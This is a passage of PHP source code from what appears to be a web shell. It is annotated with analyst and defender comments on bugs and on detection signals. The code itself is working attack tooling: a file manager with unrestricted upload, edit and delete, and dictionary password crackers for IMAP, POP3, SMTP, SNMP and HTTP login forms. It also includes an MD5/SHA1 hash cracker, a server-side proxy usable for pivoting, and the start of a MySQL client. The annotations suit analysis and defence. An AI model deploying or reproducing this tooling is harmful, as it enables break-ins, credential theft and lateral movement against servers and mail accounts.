 681 if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}}
// Upload: the file is stored in the current directory under the
// client-supplied name, unmodified, and that name is echoed back unescaped.
 682 if (!empty($_FILES['uploadfile'])){
 683 move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
 684 echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
 685 }
// Prefix of the per-entry action <select>; each row appends its own
// hlinK()-built options to it.
 686 $select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\"";
// New file (empty file_put_contents) or new directory (mkdir) named newf.
 687 if (!empty($_REQUEST['newf'])){
 688 if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");}
 689 if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
 690 }
// Windows: list existing drives B: to Z:, with the volume label fetched by
// running "vol" through shelL().
 691 if ($windows){
 692 echo "$table<td><b>Drives:</b> ";
 693 for ($i=66;$i<=90;$i++){$drive= chr($i).':';
 694 if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
 695 }
 696 echo $et;
 697 }
 698 echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>";
// Partition the directory into dirs (including "." and ".."), regular files
// and everything else ($link), each sorted. As in listdiR(), an entry named
// "0" ends the readdir() loop early.
 699 $file=array();$dir=array();$link=array();
 700 if($dirhandle = opendir($cwd)){
 701 while ($cont=readdir($dirhandle)){
 702 if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont;
 703 elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont;
 704 else $link[]=$cont;
 705 }
 706 closedir($dirhandle);
 707 sort($file);sort($dir);sort($link);
 708 echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>";
// $i only drives the alternating row shade.
 709 $i=0;
// Directory rows: owner (via posix_getpwuid, rendered as a link to the
// owner's home directory), mtime/atime, a D[R][W] flag cell and the
// Open/Rename/Remove menu. Row colour: green if writable, red if not
// readable, otherwise alternating grey.
 710 foreach($dir as $dn){
 711 echo "<tr>";
 712 $i++;
 713 $own="Unknow";
 714 $owner=posix_getpwuid(fileowner($dn));
 715 $mdate=date("Y/m/d H:i:s",filemtime($dn));
 716 $adate=date("Y/m/d H:i:s",fileatime($dn));
 717 $diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>";
 718 if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
 719 if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
 720 if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2;
 721 echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">";
// Names longer than 45 characters are truncated to 42 plus "...".
 722 if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>";
 723 echo $cl1."$own</td>";
 724 echo $cl1."$mdate</td>";
 725 echo $cl1."$adate</td>";
 726 echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>";
 727 echo "$cl1------</td>";
 728 echo $cl2.$diraction;
 729 echo "</tr>" ;
 730 flusheR();
 731 }
// File rows: same layout plus the size (showsizE) and the full action menu
// (Open/Edit/Download/Hex view/image/Include/Checksum/Copy/Move/Rename/
// Remove), each option a hlinK() URL.
 732 foreach($file as $fn){
 733 echo "<tr>";
 734 $i++;
 735 $own = "Unknow";
 736 $owner = posix_getpwuid(fileowner($fn));
 737 $fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>";
 738 $mdate = date("Y/m/d H:i:s",filemtime($fn));
 739 $adate = date("Y/m/d H:i:s",fileatime($fn));
 740 if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
 741 $size = showsizE(filesize($fn));
 742 if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
 743 if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2;
 744 echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">";
 745 if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>";
 746 echo $cl1."$own</td>";
 747 echo $cl1."$mdate</td>";
 748 echo $cl1."$adate</td>";
 749 //echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>";
 750 echo "$cl1$size</td>";
 751 echo $td2m.$fileaction;
 752 echo "</tr>" ;
 753 flusheR();
 754 }
// Rows for entries that are neither directories nor regular files (the
// "Open" option here passes the entry itself as workingdiR).
 755 foreach($link as $ln){
 756 $own = "Unknow";
 757 $i++;
 758 $owner = posix_getpwuid(fileowner($ln));
 759 $linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>";
 760 $mdate = date("Y/m/d H:i:s",filemtime($ln));
 761 $adate = date("Y/m/d H:i:s",fileatime($ln));
 762 if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
 763 echo "<tr>";
 764 $size = showsizE(filesize($ln));
 765 if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
 766 if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2;
 767 echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">";
 768 if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>";
 769 echo $cl1."$own</td>";
 770 echo $cl1."$mdate</td>";
 771 echo $cl1."$adate</td>";
 772 //echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>";
 773 echo "$cl1$size</td>";
 774 echo $cl2.$linkaction;
 775 echo "</tr>" ;
 776 flusheR();
 777 }
 778 }
// Directory count excludes "." and ".."; when $dir is empty (e.g. opendir
// failed) the -2 is clamped to 0.
 779 $dc = count($dir)-2;
 780 if($dc==-2)$dc=0;
 781 $fc = count($file);
 782 $lc = count($link);
 783 $total = $dc + $fc + $lc;
// Footer: search form, task selector, summary counts, current-directory
// status, new file/folder form and upload form. In the status cell the
// neutral branch is a bare `else "#333333";` (no echo), so that case emits
// `bgcolor=` with no value.
 784 echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b>   Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on 
this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et";
 785 }
 786 }
 787 function imaplogiN($host,$username,$password){
// Single IMAP LOGIN attempt on port 143 with a 5 s connect timeout.
// Returns -1 when the connection fails, 1 when the server answers
// "<tag> OK", 0 otherwise. namE() is declared elsewhere in the file and
// presumably produces the command tag — confirm. Credentials are sent
// unquoted, in cleartext.
// Defender note: every call is one TCP session and one LOGIN command from
// the web server, which the IMAP server logs per attempt.
 788 $sock=fsockopen($host,143,$n,$s,5);
 789 $b=namE();
 790 $l=strlen($b);
 791 if(!$sock)return -1;
// Discard the server greeting.
 792 fread($sock,1024);
 793 fputs($sock,"$b LOGIN $username $password\r\n");
// fgets(..., $l+4) returns at most $l+3 bytes — exactly the length of
// "$b OK" — so the comparison below matches only that prefix.
 794 $res=fgets($sock,$l+4);
 795 if ($res == "$b OK")return 1;else return 0;
// Unreachable: both branches above return, so the socket is never closed
// here and lives until script shutdown.
 796 fclose($sock);
 797 }
 798 function pop3logiN($server,$user,$pass){
// Single POP3 USER/PASS attempt on port 110 with a 5 s connect timeout.
// Returns -1 when the connection fails, 0 when either reply starts with
// '-' (-ERR), 1 when the PASS reply starts with '+'. Commands end in a
// bare "\n" rather than CRLF.
 799 $sock=fsockopen($server,110,$en,$es,5);
 800 if(!$sock)return -1;
// Discard the greeting.
 801 fread($sock,1024);
 802 fwrite($sock,"user $user\n");
 803 $r=fgets($sock);
// $r{0} is the old curly-brace string offset (deprecated in PHP 7.4,
// removed in 8.0, where this line is a parse error). This early return
// also leaves $sock open.
 804 if($r{0}=='-')return 0;
 805 fwrite($sock,"pass $pass\n");
 806 $r=fgets($sock);
 807 fclose($sock);
 808 if($r{0}=='+')return 1;
 809 return 0;
 810 }
 811 function imapcrackeR(){
// Dictionary driver for imaplogiN(): reads the server-side word list
// named by $_REQUEST['dictionary'] line by line, either as "user:pass"
// combos (combo set) or as passwords for the single $_REQUEST['user'],
// and prints each accepted pair. Stops at the first hit in single-user
// mode and at the first connection failure. Without target+dictionary it
// prints the request form held in the global $crack fragment.
// Defender note: the network pattern is one short session to port 143
// per dictionary line, originating from the web server — egress filtering
// of the web tier and IMAP authentication-failure alerting both expose it.
 812 global $t,$et,$errorbox,$crack;
 813 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
 814 $target=$_REQUEST['target'];
// 'combo' is read without an isset() guard; when the form omits it this
// raises an undefined-index notice and $type is null.
 815 $type=$_REQUEST['combo'];
 816 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
 817 $dictionary=fopen($_REQUEST['dictionary'],'r');
 818 if ($dictionary){
 819 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
// feof() is checked before fgets(), so a trailing newline yields one final
// empty candidate.
 820 while(!feof($dictionary)){
 821 if($type){
 822 $combo=trim(fgets($dictionary)," \n\r");
 823 $user=substr($combo,0,strpos($combo,':'));
 824 $pass=substr($combo,strpos($combo,':')+1);
 825 }else{
 826 $pass=trim(fgets($dictionary)," \n\r");
 827 }
 828 $imap=imaplogiN($target,$user,$pass);
 829 if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
 830 if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
 831 flusheR();
 832 }
 833 echo "<br>Done</font>";
 834 fclose($dictionary);
 835 }
 836 else{
 837 echo "$errorbox Can not open dictionary.$et";
 838 }
 839 }else echo "<center>${t}IMAP cracker:$crack";
 840 }
 841 function snmpcrackeR(){
// Dictionary driver for snmpchecK() (declared elsewhere in the file): each
// line of the server-side word list is tried as an SNMP community string
// against $_REQUEST['target'] with a 2 s timeout, and accepted strings
// are echoed. Unlike the mail crackers it never stops early. Without
// target+dictionary it prints its own request form.
// Defender note: the resulting burst of SNMP requests from the web server
// is a strong anomaly on a host that has no business talking SNMP.
 842 global $t,$et,$errorbox,$crack,$hcwd;
 843 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
 844 $target=$_REQUEST['target'];
 845 $dictionary=fopen($_REQUEST['dictionary'],'r');
 846 if ($dictionary){
 847 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
 848 while(!feof($dictionary)){
 849 $com=trim(fgets($dictionary)," \n\r");
 850 $res=snmpchecK($target,$com,2);
 851 if($res)echo "$com<br>";
 852 flusheR();
 853 }
 854 echo "<br>Done</font>";
 855 fclose($dictionary);
 856 }
 857 else{
 858 echo "$errorbox Can not open dictionary.$et";
 859 }
 860 }else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
 861 }
 862 function pop3crackeR(){
// Dictionary driver for pop3logiN(); structurally identical to
// imapcrackeR(): combo ("user:pass") or single-user password mode, stop on
// first hit in single-user mode, stop on the first connection failure, and
// the global $crack form when target/dictionary are absent.
// Defender note: one TCP session to port 110 per dictionary line from the
// web server; POP3 auth-failure rate alerting catches it.
 863 global $t,$et,$errorbox,$crack;
 864 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
 865 $target=$_REQUEST['target'];
// Unguarded read: undefined-index notice when 'combo' is absent.
 866 $type=$_REQUEST['combo'];
 867 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
 868 $dictionary=fopen($_REQUEST['dictionary'],'r');
 869 if ($dictionary){
 870 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
 871 while(!feof($dictionary)){
 872 if($type){
 873 $combo=trim(fgets($dictionary)," \n\r");
 874 $user=substr($combo,0,strpos($combo,':'));
 875 $pass=substr($combo,strpos($combo,':')+1);
 876 }else{
 877 $pass=trim(fgets($dictionary)," \n\r");
 878 }
 879 $pop3=pop3logiN($target,$user,$pass);
 880 if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
 881 if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
 882 flusheR();
 883 }
 884 echo "<br>Done</font>";
 885 fclose($dictionary);
 886 }
 887 else{
 888 echo "$errorbox Can not open dictionary.$et";
 889 }
 890 }else echo "<center>${t}POP3 cracker:$crack";
 891 }
 892 function smtpcrackeR(){
// Dictionary driver for smtplogiN() (declared elsewhere in the file, called
// with a 5 s timeout); same control flow as imapcrackeR()/pop3crackeR():
// combo or single-user mode, break on first hit in single-user mode, break
// on the first -1 (connection failure), $crack form otherwise.
// Defender note: repeated SMTP AUTH failures from the web server's address
// are the observable on the mail side.
 893 global $t,$et,$errorbox,$crack;
 894 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
 895 $target=$_REQUEST['target'];
// Unguarded read: undefined-index notice when 'combo' is absent.
 896 $type=$_REQUEST['combo'];
 897 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
 898 $dictionary=fopen($_REQUEST['dictionary'],'r');
 899 if ($dictionary){
 900 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
 901 while(!feof($dictionary)){
 902 if($type){
 903 $combo=trim(fgets($dictionary)," \n\r");
 904 $user=substr($combo,0,strpos($combo,':'));
 905 $pass=substr($combo,strpos($combo,':')+1);
 906 }else{
 907 $pass=trim(fgets($dictionary)," \n\r");
 908 }
 909 $smtp=smtplogiN($target,$user,$pass,5);
 910 if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
 911 if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}}
 912 flusheR();
 913 }
 914 echo "<br>Done</font>";
 915 fclose($dictionary);
 916 }
 917 else{
 918 echo "$errorbox Can not open dictionary.$et";
 919 }
 920 }else echo "<center>${t}SMTP cracker:$crack";
 921 }
 922 function formcrackeR(){
// Dictionary driver against an HTTP login form: for each candidate it
// builds a query string from the user/password/submit field names given
// in the request and calls check_urL() (declared elsewhere in the file)
// with the chosen method, the "fail" string and a 12 s timeout. A falsy
// result is treated as a hit — presumably check_urL() returns truthy when
// the fail string is found in the response; confirm against its body.
// Without 'start' it prints the configuration form.
// Defender note: because $url is appended to on every iteration (see
// below), the target's access log shows a run of requests whose URL grows
// with each attempt and repeats all earlier candidates — an unusually
// loud signature for a password-guessing run.
 923 global $errorbox,$footer,$et,$hcwd;
 924 if(!empty($_REQUEST['start'])){
 925 $url=$_REQUEST['target'];
 926 $uf=$_REQUEST['userf'];
 927 $pf=$_REQUEST['passf'];
 928 $sf=$_REQUEST['submitf'];
 929 $sv=$_REQUEST['submitv'];
 930 $method=$_REQUEST['method'];
 931 $fail=$_REQUEST['fail'];
 932 $dic=$_REQUEST['dictionary'];
 933 $type=$_REQUEST['combo'];
 934 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
// Aborts the whole page (die) rather than returning when the list is
// missing; fopen()'s own result is not checked afterwards.
 935 if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
 936 $dictionary=fopen($dic,'r');
 937 echo "<font color=blue>Cracking started...<br>";
 938 while(!feof($dictionary)){
 939 if($type){
 940 $combo=trim(fgets($dictionary)," \n\r");
 941 $user=substr($combo,0,strpos($combo,':'));
 942 $pass=substr($combo,strpos($combo,':')+1);
 943 }else{
 944 $pass=trim(fgets($dictionary)," \n\r");
 945 }
// ".=" rather than "=": the query string accumulates across iterations, so
// from the second attempt on the URL carries a second "?..." segment and
// every previous candidate. Values are not URL-encoded.
 946 $url.="?$uf=$user&$pf=$pass&$sf=$sv";
 947 $res=check_urL($url,$method,$fail,12);
 948 if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
 949 flusheR();
 950 }
 951 fclose($dictionary);
 952 echo "Done!</font><br>";
 953 }
 954 else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv 
size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
 955 }
function hashcrackeR(){
// Dictionary attack against one MD5/SHA1 digest supplied in the request.
// Inputs (all from $_REQUEST): 'hash', 'dictionary' (a path handed straight to
// fopen(), no restriction on what it points at) and 'type' ('MD5' selects
// md5(); any other value falls through to sha1()).
// Output: HTML. Prints "The answer is <word>" on the first match, then "Done!".
// Analyst notes: the matched $word is echoed unescaped; the comparison below is
// a loose == on upper-cased strings, so in PHP versions where numeric-looking
// strings compare numerically, digests of the form "0e<digits>" compare equal.
global $errorbox,$t,$et,$hcwd;
if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
// Both sides are upper-cased so the hex case of the input does not matter.
$hash=strtoupper($_REQUEST['hash']);
echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
// $type is used as a variable function name in the loop below.
$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
while(!feof($dictionary)){
$word=trim(fgets($dictionary)," \n\r");
if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
}
echo "Done!</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
}
// The input form is rendered after any run (and on a bare visit).
echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
}
function pr0xy(){
// Server-side "navigator": fetches the URL in $_REQUEST['urL'] from the web
// server itself and streams the response back, rewriting href attributes so
// that links route through this function again (seC=px&urL=...).
// Analyst notes: this is a pivot/SSRF primitive - any host reachable from the
// server can be requested. The connection is always to TCP port 80 (the URL's
// scheme and port are ignored). The whole raw HTTP response, status line and
// headers included, is echoed without escaping.
global $errorbox,$et,$footer,$hcwd;
// Note: if(!!empty(...)) is just empty(...); the default value is a
// hard-coded remote "what is my IP" page.
echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
if (!empty($_REQUEST['urL'])){
$dir="";
$u=parse_url($_REQUEST['urL']);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
// For a path that starts with '/', strpos() returns 0 and $dir stays "",
// so the relative-link rewrites below resolve against "http://$host//".
if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
$url=@fsockopen($host, 80, $errno, $errstr, 12);
if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
// $file already begins with '/', so the request line is "GET //path ...".
fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
while(!feof($url)){
$con = fgets($url);
// mailto links are renamed to HrEf so the later href= rewrites skip them
// (str_replace is case-sensitive, so "HrEf" no longer matches "href").
$con = str_replace("href=mailto","HrEf=mailto",$con);
$con = str_replace("HREF=mailto","HrEf=mailto",$con);
$con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
$con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
// Absolute http links: prefix with this script's proxy URL.
$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
// Remaining (relative) links: resolve against the fetched host/dir.
$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
// The next two patterns were already consumed by the two lines above, so
// they never match anything.
$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
echo $con;
}
fclose($url);
}
}
function mysqlclienT(){
// Ad-hoc MySQL client: connects with request-supplied server/user/password
// and runs the request-supplied query verbatim, printing each row as
// tab-separated values.
// Analyst notes: uses the legacy mysql_* extension (absent in PHP 7+). Row
// values are echoed raw (no htmlspecialchars). mysql_query()'s result is not
// checked, so a failed or non-SELECT query reaches mysql_fetch_row() with a
// non-resource. The sticky-form code at the bottom reads lowercase keys
// ('server','user','pass','db','query') while the form submits serveR/useR/
// pasS/dB/querY, so the submitted values are never echoed back - the defaults
// (localhost:3306 / root / 123456 / SHOW DATABASES) are shown instead.
global $t,$errorbox,$et,$hcwd;
